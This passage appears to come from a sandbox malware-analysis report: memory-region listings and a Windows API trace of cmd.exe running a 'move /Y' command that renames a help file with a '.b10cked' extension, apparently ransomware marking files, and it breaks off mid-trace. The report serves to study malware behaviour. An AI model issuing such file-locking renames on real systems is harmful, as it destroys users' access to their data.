"pagefile_0x000000007f6f0000" filename = "" Region: id = 29021 start_va = 0x3a0000 end_va = 0x467fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 29022 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 29023 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 29024 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 29025 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 29026 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 29027 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 29028 start_va = 0x510000 end_va = 0x610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 29029 start_va = 0x620000 end_va = 0x121ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 29030 start_va = 0x1220000 end_va = 0x1382fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001220000" filename = "" Region: id = 29033 start_va = 0x1390000 end_va = 0x144ffff entry_point = 0x1390000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 648 os_tid = 0xbd8 [0196.626] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efe94 | out: lpSystemTimeAsFileTime=0x1efe94*(dwLowDateTime=0xaa043480, dwHighDateTime=0x1d440a9)) [0196.626] GetCurrentProcessId () returned 0xa70 [0196.626] GetCurrentThreadId () returned 0xbd8 [0196.626] GetTickCount () returned 0x37b75 [0196.626] QueryPerformanceCounter (in: lpPerformanceCount=0x1efe8c | out: lpPerformanceCount=0x1efe8c*=25341544766) returned 1 [0196.627] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0196.627] __set_app_type (_Type=0x1) [0196.627] __p__fmode () returned 0x76b331f4 [0196.627] __p__commode () returned 0x76b331fc [0196.627] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0196.627] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0196.627] GetCurrentThreadId () returned 0xbd8 [0196.627] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbd8) returned 0x38 [0196.627] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0196.627] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0196.627] SetThreadUILanguage (LangId=0x0) returned 0x409 [0196.628] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0196.628] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1efe24 | out: phkResult=0x1efe24*=0x0) returned 0x2 [0196.628] VirtualQuery (in: lpAddress=0x1efe5b, lpBuffer=0x1efdf4, dwLength=0x1c | out: lpBuffer=0x1efdf4*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0196.628] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1efdf4, dwLength=0x1c | out: lpBuffer=0x1efdf4*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0196.628] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1efdf4, dwLength=0x1c | out: lpBuffer=0x1efdf4*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0196.628] VirtualQuery (in: lpAddress=0xf3000, lpBuffer=0x1efdf4, dwLength=0x1c | out: lpBuffer=0x1efdf4*(BaseAddress=0xf3000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0196.628] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1efdf4, dwLength=0x1c | out: lpBuffer=0x1efdf4*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0196.628] GetConsoleOutputCP () returned 0x1b5 [0196.628] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0196.628] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0196.628] _get_osfhandle (_FileHandle=1) returned 0x7 [0196.628] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0196.628] _get_osfhandle (_FileHandle=1) returned 0x7 [0196.628] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0196.628] _get_osfhandle (_FileHandle=1) returned 0x7 [0196.628] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0196.629] _get_osfhandle (_FileHandle=0) returned 0x3 [0196.629] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0196.629] _get_osfhandle (_FileHandle=0) returned 0x3 [0196.629] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0196.629] GetEnvironmentStringsW () returned 0x2b0180* [0196.629] FreeEnvironmentStringsW (penv=0x2b0180) returned 1 [0196.629] GetEnvironmentStringsW () returned 0x2b0180* [0196.629] FreeEnvironmentStringsW (penv=0x2b0180) returned 1 [0196.629] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eed94 | out: phkResult=0x1eed94*=0x40) returned 0x0 [0196.629] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eed9c, lpData=0x1eeda0, lpcbData=0x1eed98*=0x1000 | out: lpType=0x1eed9c*=0x0, lpData=0x1eeda0*=0xa8, lpcbData=0x1eed98*=0x1000) returned 0x2 [0196.629] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eed9c, lpData=0x1eeda0, lpcbData=0x1eed98*=0x1000 | out: lpType=0x1eed9c*=0x4, lpData=0x1eeda0*=0x1, lpcbData=0x1eed98*=0x4) returned 0x0 [0196.629] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eed9c, lpData=0x1eeda0, lpcbData=0x1eed98*=0x1000 | out: lpType=0x1eed9c*=0x0, lpData=0x1eeda0*=0x1, lpcbData=0x1eed98*=0x1000) returned 0x2 [0196.629] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eed9c, lpData=0x1eeda0, lpcbData=0x1eed98*=0x1000 | out: lpType=0x1eed9c*=0x4, lpData=0x1eeda0*=0x0, lpcbData=0x1eed98*=0x4) returned 0x0 [0196.630] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eed9c, lpData=0x1eeda0, lpcbData=0x1eed98*=0x1000 | out: lpType=0x1eed9c*=0x4, lpData=0x1eeda0*=0x40, lpcbData=0x1eed98*=0x4) returned 0x0 [0196.630] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eed9c, lpData=0x1eeda0, lpcbData=0x1eed98*=0x1000 | out: lpType=0x1eed9c*=0x4, lpData=0x1eeda0*=0x40, lpcbData=0x1eed98*=0x4) returned 0x0 [0196.630] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eed9c, lpData=0x1eeda0, lpcbData=0x1eed98*=0x1000 | out: lpType=0x1eed9c*=0x0, lpData=0x1eeda0*=0x40, lpcbData=0x1eed98*=0x1000) returned 0x2 [0196.630] RegCloseKey (hKey=0x40) returned 0x0 [0196.630] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eed94 | out: phkResult=0x1eed94*=0x40) returned 0x0 [0196.630] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eed9c, lpData=0x1eeda0, lpcbData=0x1eed98*=0x1000 | out: lpType=0x1eed9c*=0x0, lpData=0x1eeda0*=0x40, lpcbData=0x1eed98*=0x1000) returned 0x2 [0196.630] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eed9c, lpData=0x1eeda0, lpcbData=0x1eed98*=0x1000 | out: lpType=0x1eed9c*=0x4, lpData=0x1eeda0*=0x1, lpcbData=0x1eed98*=0x4) returned 0x0 [0196.630] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eed9c, lpData=0x1eeda0, lpcbData=0x1eed98*=0x1000 | out: lpType=0x1eed9c*=0x0, lpData=0x1eeda0*=0x1, lpcbData=0x1eed98*=0x1000) returned 0x2 [0196.630] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eed9c, lpData=0x1eeda0, lpcbData=0x1eed98*=0x1000 | out: lpType=0x1eed9c*=0x4, lpData=0x1eeda0*=0x0, lpcbData=0x1eed98*=0x4) returned 0x0 [0196.630] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eed9c, lpData=0x1eeda0, lpcbData=0x1eed98*=0x1000 | out: lpType=0x1eed9c*=0x4, lpData=0x1eeda0*=0x9, lpcbData=0x1eed98*=0x4) returned 0x0 [0196.630] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eed9c, lpData=0x1eeda0, lpcbData=0x1eed98*=0x1000 | out: lpType=0x1eed9c*=0x4, lpData=0x1eeda0*=0x9, lpcbData=0x1eed98*=0x4) returned 0x0 [0196.630] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eed9c, lpData=0x1eeda0, lpcbData=0x1eed98*=0x1000 | out: lpType=0x1eed9c*=0x0, lpData=0x1eeda0*=0x9, lpcbData=0x1eed98*=0x1000) returned 0x2 [0196.630] RegCloseKey (hKey=0x40) returned 0x0 [0196.630] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88639e [0196.630] srand (_Seed=0x5b88639e) [0196.630] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXH\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MTOC_Hx.HxH.b10cked\"" [0196.630] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXH\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MTOC_Hx.HxH.b10cked\"" [0196.630] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0196.631] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2b18e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0196.631] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0196.631] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0196.631] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0196.631] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0196.631] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0196.631] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0196.631] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0196.631] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0196.631] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0196.631] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0196.631] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0196.631] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0196.632] GetEnvironmentStringsW () returned 0x2b22d0* [0196.632] FreeEnvironmentStringsW (penv=0x2b22d0) returned 1 [0196.632] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0196.632] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0196.632] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0196.632] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0196.632] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0196.632] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0196.632] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0196.632] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0196.632] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0196.632] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0196.632] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1efb60 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0196.632] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1efb60, lpFilePart=0x1efb5c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1efb5c*="Desktop") returned 0x18 [0196.632] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0196.632] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef8dc | out: lpFindFileData=0x1ef8dc) returned 0x2b0010 [0196.632] FindClose (in: hFindFile=0x2b0010 | out: hFindFile=0x2b0010) returned 1 [0196.632] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1ef8dc | out: lpFindFileData=0x1ef8dc) returned 0x2b0010 [0196.633] FindClose (in: hFindFile=0x2b0010 | out: hFindFile=0x2b0010) returned 1 [0196.633] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1ef8dc | out: lpFindFileData=0x1ef8dc) returned 0x2b0010 [0196.633] FindClose (in: hFindFile=0x2b0010 | out: hFindFile=0x2b0010) returned 1 [0196.633] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0196.633] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0196.633] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0196.633] GetEnvironmentStringsW () returned 0x2b2af0* [0196.633] FreeEnvironmentStringsW (penv=0x2b2af0) returned 1 [0196.633] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0196.634] GetConsoleOutputCP () returned 0x1b5 [0196.634] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0196.634] GetUserDefaultLCID () returned 0x409 [0196.634] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0196.634] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1efca0, cchData=128 | out: lpLCData="0") returned 2 [0196.634] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1efca0, cchData=128 | out: lpLCData="0") returned 2 [0196.634] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1efca0, cchData=128 | out: lpLCData="1") returned 2 [0196.634] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0196.634] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0196.634] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0196.634] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0196.634] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0196.634] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0196.634] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0196.634] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0196.634] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0196.634] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0196.634] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0196.635] GetConsoleTitleW (in: lpConsoleTitle=0x2a08e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0196.635] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0196.635] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0196.635] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0196.635] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0196.636] _wcsicmp (_String1="move", _String2=")") returned 68 [0196.636] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0196.636] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0196.636] _wcsicmp (_String1="IF", _String2="move") returned -4 [0196.636] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0196.636] _wcsicmp (_String1="REM", _String2="move") returned 5 [0196.636] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0196.639] GetConsoleTitleW (in: lpConsoleTitle=0x1ef998, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0196.639] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0196.639] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0196.639] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0196.639] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0196.639] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0196.639] _wcsicmp (_String1="move", _String2="CD") returned 10 [0196.639] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0196.639] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0196.639] _wcsicmp (_String1="move", _String2="REN") returned -5 [0196.639] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0196.639] _wcsicmp (_String1="move", _String2="SET") returned -6 [0196.639] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0196.639] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0196.639] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0196.639] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0196.639] _wcsicmp (_String1="move", _String2="MD") returned 11 [0196.639] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0196.639] _wcsicmp (_String1="move", _String2="RD") returned -5 [0196.639] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0196.639] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0196.639] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0196.639] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0196.640] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0196.640] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0196.640] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0196.640] _wcsicmp (_String1="move", _String2="VER") returned -9 [0196.640] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0196.640] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0196.640] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0196.640] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0196.640] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0196.640] _wcsicmp (_String1="move", _String2="START") returned -6 [0196.640] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0196.640] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0196.640] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0196.641] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0196.641] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0196.641] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1ef754, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1ef74c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ef74c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0196.642] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0196.643] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0196.643] _wcsicmp (_String1="HX_103~1.HXH", _String2=".") returned 58 [0196.643] _wcsicmp (_String1="HX_103~1.HXH", _String2="..") returned 58 [0196.643] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXH" (normalized: "c:\\users\\alluse~1\\micros~2\\hx_103~1.hxh")) returned 0x2022 [0196.643] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2b1e38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0196.643] SetErrorMode (uMode=0x0) returned 0x0 [0196.643] SetErrorMode (uMode=0x1) returned 0x0 [0196.643] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXH", nBufferLength=0x104, lpBuffer=0x1ef0dc, lpFilePart=0x1ef0c4 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXH", lpFilePart=0x1ef0c4*="HX_103~1.HXH") returned 0x27 [0196.643] SetErrorMode (uMode=0x0) returned 0x1 [0196.643] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0196.643] _wcsicmp (_String1="HX_103~1.HXH", _String2=".") returned 58 [0196.643] _wcsicmp (_String1="HX_103~1.HXH", _String2="..") returned 58 [0196.643] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXH" (normalized: "c:\\users\\alluse~1\\micros~2\\hx_103~1.hxh")) returned 0x2022 [0196.644] SetErrorMode (uMode=0x0) returned 0x0 [0196.644] SetErrorMode (uMode=0x1) returned 0x0 [0196.644] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXH", nBufferLength=0x104, lpBuffer=0x1ef558, lpFilePart=0x1ef2f0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXH", lpFilePart=0x1ef2f0*="HX_103~1.HXH") returned 0x27 [0196.644] SetErrorMode (uMode=0x0) returned 0x1 [0196.644] SetErrorMode (uMode=0x0) returned 0x0 [0196.644] SetErrorMode (uMode=0x1) returned 0x0 [0196.644] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MTOC_Hx.HxH.b10cked", nBufferLength=0x104, lpBuffer=0x1ef760, lpFilePart=0x1ef2f0 | out: 